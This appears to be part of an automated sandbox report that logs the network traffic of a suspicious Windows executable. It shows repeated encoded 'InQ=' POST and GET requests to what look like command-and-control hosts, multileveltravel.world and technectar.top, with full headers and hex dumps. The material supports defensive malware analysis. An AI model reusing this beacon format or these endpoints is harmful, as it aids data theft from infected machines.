                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 49 6e 51 3d 58 55 31 73 68 31 58 74 4d 69 64 65 4a 64 63 6a 6a 77 39 74 76 31 63 65 33 46 36 71 30 77 52 32 67 58 47 77 52 35 57 41 53 79 4a 31 74 6c 49 6e 79 71 63 39 49 54 54 73 39 38 31 6e 52 63 66 74 2f 52 4b 63 71 37 46 56 68 65 4d 58 4d 4e 36 7a 4a 6f 35 69 4f 78 73 4d 41 4e 54 54 38 6e 69 41 53 63 71 62 2b 51 59 54 4e 6f 33 64 5a 7a 33 51 71 31 45 76 73 50 67 3d 26 34 62 30 64 4d 3d 66 44 59 50 46 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?InQ=XU1sh1XtMideJdcjjw9tv1ce3F6q0wR2gXGwR5WASyJ1tlInyqc9ITTs981nRcft/RKcq7FVheMXMN6zJo5iOxsMANTT8niAScqb+QYTNo3dZz3Qq1EvsPg=&4b0dM=fDYPF"}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.4500193.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:12.071715117 CET825OUTPOST /kdfx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.multileveltravel.world
                                                                                                                    Origin: http://www.multileveltravel.world
                                                                                                                    Referer: http://www.multileveltravel.world/kdfx/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 35 75 4a 73 39 50 6d 30 6b 73 76 70 4f 50 47 58 77 57 49 49 44 2b 37 63 59 6e 37 76 49 51 54 77 35 6d 57 69 56 67 4e 4e 6f 36 4e 64 42 4b 52 61 58 4f 61 61 36 37 46 2f 67 4a 42 4d 79 7a 78 6e 63 48 69 56 49 75 5a 4d 53 45 67 6e 66 5a 56 34 70 30 35 30 6d 33 59 58 6c 6e 4b 45 50 58 2b 51 7a 4f 73 73 54 59 53 56 73 45 67 45 38 6b 6e 62 32 56 61 57 68 66 6d 75 62 36 47 5a 6e 7a 75 71 73 74 6f 6e 52 31 2b 31 72 6e 69 76 72 38 54 4b 4f 34 45 39 34 70 6b 33 2b 67 4f 6d 73 31 57 57 31 51 44 37 38 47 6a 36 42 77 68 2b 36 45 6a 5a 6d 4a 2f 4f 66 41 3d 3d
                                                                                                                    Data Ascii: InQ=TPrAkU/pRz0b5uJs9Pm0ksvpOPGXwWIID+7cYn7vIQTw5mWiVgNNo6NdBKRaXOaa67F/gJBMyzxncHiVIuZMSEgnfZV4p050m3YXlnKEPX+QzOssTYSVsEgE8knb2VaWhfmub6GZnzuqstonR1+1rnivr8TKO4E94pk3+gOms1WW1QD78Gj6Bwh+6EjZmJ/OfA==


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.4500203.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:14.615715027 CET845OUTPOST /kdfx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.multileveltravel.world
                                                                                                                    Origin: http://www.multileveltravel.world
                                                                                                                    Referer: http://www.multileveltravel.world/kdfx/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 34 4e 52 73 77 4d 4f 30 73 73 75 62 43 76 47 58 2b 32 49 79 44 2b 33 63 59 6c 57 6f 49 6a 6e 77 36 45 4f 69 55 6b 52 4e 70 36 4e 64 4b 71 52 66 59 75 61 42 36 37 49 63 67 4c 46 4d 79 7a 31 6e 63 47 53 56 49 5a 4e 50 64 30 67 6c 4b 4a 56 70 74 30 35 30 6d 33 59 58 6c 6e 33 76 50 58 6d 51 7a 66 38 73 54 38 4f 53 6c 6b 67 48 71 30 6e 62 6e 6c 61 53 68 66 6d 41 62 2f 75 7a 6e 32 71 71 73 76 77 6e 52 6b 2b 71 6c 6e 69 74 32 4d 53 31 4f 4c 68 4c 78 72 56 6d 35 6a 71 48 7a 42 4b 79 30 57 53 68 74 33 43 74 54 77 46 4e 6e 44 71 74 72 4b 43 48 45 4b 6b 45 79 6e 37 72 51 52 34 69 63 6a 53 50 4c 6c 77 6f 39 6e 6f 3d
                                                                                                                    Data Ascii: InQ=TPrAkU/pRz0b4NRswMO0ssubCvGX+2IyD+3cYlWoIjnw6EOiUkRNp6NdKqRfYuaB67IcgLFMyz1ncGSVIZNPd0glKJVpt050m3YXln3vPXmQzf8sT8OSlkgHq0nbnlaShfmAb/uzn2qqsvwnRk+qlnit2MS1OLhLxrVm5jqHzBKy0WSht3CtTwFNnDqtrKCHEKkEyn7rQR4icjSPLlwo9no=


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.4500213.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:17.162743092 CET10927OUTPOST /kdfx/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.multileveltravel.world
                                                                                                                    Origin: http://www.multileveltravel.world
                                                                                                                    Referer: http://www.multileveltravel.world/kdfx/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 54 50 72 41 6b 55 2f 70 52 7a 30 62 34 4e 52 73 77 4d 4f 30 73 73 75 62 43 76 47 58 2b 32 49 79 44 2b 33 63 59 6c 57 6f 49 6a 2f 77 36 33 47 69 56 44 6c 4e 7a 36 4e 64 57 36 52 65 59 75 61 41 36 37 68 56 67 4c 5a 36 79 78 64 6e 64 67 4f 56 4f 74 68 50 47 6b 67 6c 53 35 56 35 70 30 35 62 6d 30 67 4c 6c 6e 48 76 50 58 6d 51 7a 63 30 73 61 49 53 53 70 45 67 45 38 6b 6e 70 32 56 61 36 68 62 4c 39 62 2f 71 4a 6b 43 65 71 73 50 67 6e 54 57 57 71 74 6e 69 7a 33 4d 53 74 4f 4c 64 59 78 72 5a 71 35 69 4f 68 7a 47 69 79 31 43 50 51 36 55 79 4c 52 67 4a 58 31 7a 37 4d 6c 70 4f 4b 50 4b 55 2b 36 31 44 75 53 77 39 4d 62 52 76 59 4f 6e 63 34 6e 52 65 73 6c 30 59 52 55 77 4e 41 32 70 72 5a 6e 72 7a 79 31 45 46 38 66 78 6b 61 2f 78 78 52 39 74 51 4f 59 4e 78 55 79 66 47 33 6b 6a 6c 2b 64 78 4b 65 78 66 66 39 43 62 37 64 6c 78 62 4b 57 76 39 64 69 46 63 49 30 64 4b 47 79 2f 6f 72 32 49 4f 38 42 41 6d 55 62 35 77 38 7a 6d 51 2b 6b 30 4a 75 34 35 58 7a 73 4f 35 6c 37 73 36 6e 61 50 6f 77 32 49 59 55 31 68 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=TPrAkU/pRz0b4NRswMO0ssubCvGX+2IyD+3cYlWoIj/w63GiVDlNz6NdW6ReYuaA67hVgLZ6yxdndgOVOthPGkglS5V5p05bm0gLlnHvPXmQzc0saISSpEgE8knp2Va6hbL9b/qJkCeqsPgnTWWqtniz3MStOLdYxrZq5iOhzGiy1CPQ6UyLRgJX1z7MlpOKPKU+61DuSw9MbRvYOnc4nResl0YRUwNA2prZnrzy1EF8fxka/xxR9tQOYNxUyfG3kjl+dxKexff9Cb7dlxbKWv9diFcI0dKGy/or2IO8BAmUb5w8zmQ+k0Ju45XzsO5l7s6naPow2IYU1hbtRuDwL+ttPjvbIongPDYfNJtLedpFFBPuG+vU8UnLQHy5RZw7XwojNoFtX7LQyknSMc9l4RNUsPqyKkIXdQx+JucvAFa9kCBY0/A/7H+H57ios/oqVBHlwCchYC+dn9eDgTHuxktNPYVbkB1AXg0np7N1psdkvkU/O2VPK4S6TOieH+VDPMjVNJFRBuuIsfH3raoxYINClY67diRgE7HzCuKK6ShXULkKk1R+sC7EkAVkH8k4q1y9EvRz5o8qYjSQi6M27c7aOdlNoWpXIVUpXhwXjiL/mx1xh3PJ0TALYQxJODf9cUQEG5SJw0IFeho2cOkYy36a+Q37OTpgKHZ+zKf1tfc+lxT6TBXPhUZAfc+xBYOWI56sBB4qyjEfvWCTa4EzRhf4rHZyaaZ2tKfyvxUb7KuQDcBF5PIhTspkuE+OOyxR5nCXbFHu2MCKQV/S1wLCpCxg+6RmWJugA2nB27LLjcmjNfn4nEOsQqGZIyOu/WxJ49wxQq8AYnCV9lGTRlfvm1rviEtDQhlIWQQ7enL2YT7KBKH3nITjio5x+aas4zsdt3s8V9sMvd2yQSmYAg+LMll0FTULGHYoaUG5tCy+yruAeEVjD1Q6JvrY30wiOWFBnF2cIuNoSeOQ6z9/oUAeQ8b38p+Ce2N68ZckAUtEQso4EQvu [TRUNCATED]


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.4500223.33.130.190803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:19.707557917 CET540OUTGET /kdfx/?4b0dM=fDYPF&InQ=eNDgnj/WfiIi0tdhycbCw+iXO8euh2ZcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZW0B0X+kPjhgk6HpPnQraaSGImvIvXcettGI= HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.multileveltravel.world
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Nov 2, 2024 20:00:20.361977100 CET391INHTTP/1.1 200 OK
                                                                                                                    Server: openresty
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:20 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 251
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 62 30 64 4d 3d 66 44 59 50 46 26 49 6e 51 3d 65 4e 44 67 6e 6a 2f 57 66 69 49 69 30 74 64 68 79 63 62 43 77 2b 69 58 4f 38 65 75 68 32 5a 63 57 5a 54 35 53 6c 54 71 4b 41 6e 35 79 58 69 34 52 44 31 36 38 39 6f 57 4f 76 56 38 4f 64 2b 4f 79 2b 38 63 74 62 64 78 37 44 4a 2f 61 6c 79 54 48 4f 4e 5a 57 30 42 30 58 2b 6b 50 6a 68 67 6b 36 48 70 50 6e 51 72 61 61 53 47 49 6d 76 49 76 58 63 65 74 74 47 49 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4b0dM=fDYPF&InQ=eNDgnj/WfiIi0tdhycbCw+iXO8euh2ZcWZT5SlTqKAn5yXi4RD1689oWOvV8Od+Oy+8ctbdx7DJ/alyTHONZW0B0X+kPjhgk6HpPnQraaSGImvIvXcettGI="}</script></head></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    21192.168.2.450023199.192.21.169803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:25.583009005 CET801OUTPOST /ghvt/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.technectar.top
                                                                                                                    Origin: http://www.technectar.top
                                                                                                                    Referer: http://www.technectar.top/ghvt/
                                                                                                                    Content-Length: 200
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 47 52 4c 6b 54 6b 58 6b 74 74 6c 2b 62 2f 4f 77 50 46 30 34 35 70 65 74 6a 35 75 57 77 62 47 31 34 33 39 38 75 47 76 62 69 4f 75 61 72 4b 4e 75 6f 42 4f 70 31 77 5a 44 47 56 36 54 39 71 44 54 69 73 74 30 4a 58 69 6a 41 56 75 47 35 61 45 78 4d 47 30 42 68 2b 4a 69 41 33 73 72 62 34 68 4d 79 34 65 6d 77 4d 70 75 35 36 51 79 56 6c 59 6d 6e 5a 51 67 31 43 52 61 67 2f 71 2f 69 53 73 6f 32 46 54 44 30 65 59 41 58 39 4e 4b 4f 6a 43 57 50 32 48 51 37 53 52 76 71 79 35 42 33 33 2b 54 61 56 6f 52 6e 70 6d 4d 6d 52 2f 72 6a 49 6d 62 41 59 63 4e 65 52 67 75 41 30 4c 6d 66 78 31 47 79 41 3d 3d
                                                                                                                    Data Ascii: InQ=GRLkTkXkttl+b/OwPF045petj5uWwbG14398uGvbiOuarKNuoBOp1wZDGV6T9qDTist0JXijAVuG5aExMG0Bh+JiA3srb4hMy4emwMpu56QyVlYmnZQg1CRag/q/iSso2FTD0eYAX9NKOjCWP2HQ7SRvqy5B33+TaVoRnpmMmR/rjImbAYcNeRguA0Lmfx1GyA==
                                                                                                                    Nov 2, 2024 20:00:26.299828053 CET918INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:26 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 774
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    22192.168.2.450024199.192.21.169803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:28.321188927 CET821OUTPOST /ghvt/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.technectar.top
                                                                                                                    Origin: http://www.technectar.top
                                                                                                                    Referer: http://www.technectar.top/ghvt/
                                                                                                                    Content-Length: 220
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 47 52 4c 6b 54 6b 58 6b 74 74 6c 2b 4b 73 57 77 49 6b 30 34 6f 5a 65 71 6d 35 75 57 37 37 47 35 34 33 68 38 75 44 58 78 33 6f 65 61 79 71 39 75 76 77 4f 70 79 77 5a 44 4e 31 37 62 35 71 44 55 69 73 68 4b 4a 53 4b 6a 41 56 36 47 35 62 30 78 4d 31 73 43 6e 75 4a 67 4b 6e 73 70 66 34 68 4d 79 34 65 6d 77 4d 39 45 35 36 49 79 56 31 6f 6d 6d 34 51 76 72 53 52 5a 6f 66 71 2f 6d 53 73 73 32 46 53 51 30 61 59 6d 58 2f 46 4b 4f 6a 53 57 50 44 6e 54 78 53 52 70 67 53 34 53 68 79 57 65 56 47 6b 63 68 50 79 37 35 31 2b 4d 76 75 33 42 52 70 39 61 4d 52 45 64 64 7a 43 53 53 79 49 50 70 4a 42 41 4c 52 42 4e 55 2f 6d 58 67 41 6b 50 7a 4e 4c 63 38 57 55 3d
                                                                                                                    Data Ascii: InQ=GRLkTkXkttl+KsWwIk04oZeqm5uW77G543h8uDXx3oeayq9uvwOpywZDN17b5qDUishKJSKjAV6G5b0xM1sCnuJgKnspf4hMy4emwM9E56IyV1omm4QvrSRZofq/mSss2FSQ0aYmX/FKOjSWPDnTxSRpgS4ShyWeVGkchPy751+Mvu3BRp9aMREddzCSSyIPpJBALRBNU/mXgAkPzNLc8WU=
                                                                                                                    Nov 2, 2024 20:00:29.019227028 CET918INHTTP/1.1 404 Not Found
                                                                                                                    Date: Sat, 02 Nov 2024 19:00:28 GMT
                                                                                                                    Server: Apache
                                                                                                                    Content-Length: 774
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html
                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    23192.168.2.450025199.192.21.169803104C:\Program Files (x86)\usqznWXOKvyIPkNnzHpCzicejZHhYkGDUazjvSeBK\iadfuWOlEqeEML.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Nov 2, 2024 20:00:30.883768082 CET10903OUTPOST /ghvt/ HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Host: www.technectar.top
                                                                                                                    Origin: http://www.technectar.top
                                                                                                                    Referer: http://www.technectar.top/ghvt/
                                                                                                                    Content-Length: 10300
                                                                                                                    Cache-Control: max-age=0
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; MSN 9.0;MSN 9.1;MSN 9.6;MSN 10.0;MSN 10.2;MSN 10.5; MSNbMSNI; MSNmen-us; MSNcOTH)
                                                                                                                    Data Raw: 49 6e 51 3d 47 52 4c 6b 54 6b 58 6b 74 74 6c 2b 4b 73 57 77 49 6b 30 34 6f 5a 65 71 6d 35 75 57 37 37 47 35 34 33 68 38 75 44 58 78 33 72 2b 61 75 4c 64 75 6f 6a 32 70 7a 77 5a 44 52 6c 37 61 35 71 44 46 69 73 35 57 4a 53 47 64 41 57 43 47 72 70 38 78 48 6b 73 43 70 75 4a 67 45 33 73 6f 62 34 68 56 79 38 79 71 77 4d 74 45 35 36 49 79 56 32 77 6d 69 70 51 76 70 53 52 61 67 2f 71 7a 69 53 73 45 32 46 4c 6c 30 61 4d 32 58 75 6c 4b 4f 48 4f 57 63 41 50 54 39 53 52 72 6e 53 35 56 68 79 54 65 56 47 4a 74 68 50 76 73 35 79 4f 4d 2b 72 53 74 45 49 4e 6e 58 69 6f 35 4a 69 36 59 4b 42 77 76 71 5a 31 4a 50 43 46 4c 45 36 47 37 36 44 64 36 6e 66 61 66 71 53 31 6e 53 61 78 38 67 37 71 4b 4d 35 39 59 2b 62 4c 35 42 74 7a 4c 39 39 72 2f 66 70 6c 47 30 58 30 75 66 34 56 76 75 54 38 52 78 36 4d 30 78 2b 6b 69 47 57 58 50 70 57 51 68 55 30 55 46 43 4e 57 4a 71 51 4d 4a 74 73 38 2f 6f 63 39 35 5a 41 49 2f 66 61 34 4b 4c 61 31 4f 6a 62 45 36 4e 73 61 73 79 51 75 55 77 4a 39 61 55 65 61 48 48 47 5a 48 72 56 70 35 62 57 [TRUNCATED]
                                                                                                                    Data Ascii: InQ=GRLkTkXkttl+KsWwIk04oZeqm5uW77G543h8uDXx3r+auLduoj2pzwZDRl7a5qDFis5WJSGdAWCGrp8xHksCpuJgE3sob4hVy8yqwMtE56IyV2wmipQvpSRag/qziSsE2FLl0aM2XulKOHOWcAPT9SRrnS5VhyTeVGJthPvs5yOM+rStEINnXio5Ji6YKBwvqZ1JPCFLE6G76Dd6nfafqS1nSax8g7qKM59Y+bL5BtzL99r/fplG0X0uf4VvuT8Rx6M0x+kiGWXPpWQhU0UFCNWJqQMJts8/oc95ZAI/fa4KLa1OjbE6NsasyQuUwJ9aUeaHHGZHrVp5bWYyVeCkuNxN+LlTO9cTINVb7W33hnosm1NUBbtHII8lW1oD/aGfq4LnZShhmRMgpR++NLTsU1UYJXmaKCaasPQfqyD1ALme868Ae/frvzmVitTOtl51MBzO514M70fwys8wMEha/hRao9TPLLn9lm3MJjiBKMA4uG1Aru2ZdBMOfbA6EIXcHcF76UP/dx9YhKW/NoP8oSvUcCiCPKqi4qjzIqmnjtu88KNqZ5LhOr7D7ojAgw15u1fJB1DHlTx1MiAmQAVX/EIKbJkcrxszxOVgDSJNiBPcVJF46MV5iMm5LlJ/FfpWX7Jkq90Wp29KQR84iW0lw7zOy66CAowuectCkP06fvFE+tAbWJBP+zIyR/Xlm1U2dkNd+WIalKStBSzQdVzOd3SDBrMMjTuOmw+1dc9/3lgxEMfuHN+xy2raDpvy08bzfNg4tYxPgzSXbwI6x+aqo4s9iGQWR0Fc8N/GW12SxYvWQO2Q3NqPlNfdXESq82h/iU9fSX1pALHRQK3+JuWmP4AcJE7mGhZmwqQnk97zfKSKrAviW9Hal2sQ4bVwvZUOG35J5bhf5KiGqs+MuUu4LX/PHN10SpBkCaeTb4GXPT+erONmqTUMlKHY2yYaiVePLKOjo+DUy3fQZGavClAIzr9IJGJidA9SkGgSjY37DoDIEm3Y [TRUNCATED]
